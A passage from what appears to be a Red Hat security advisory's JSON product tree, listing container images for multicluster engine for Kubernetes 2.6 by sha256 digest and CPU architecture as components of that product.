"registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le as a component of 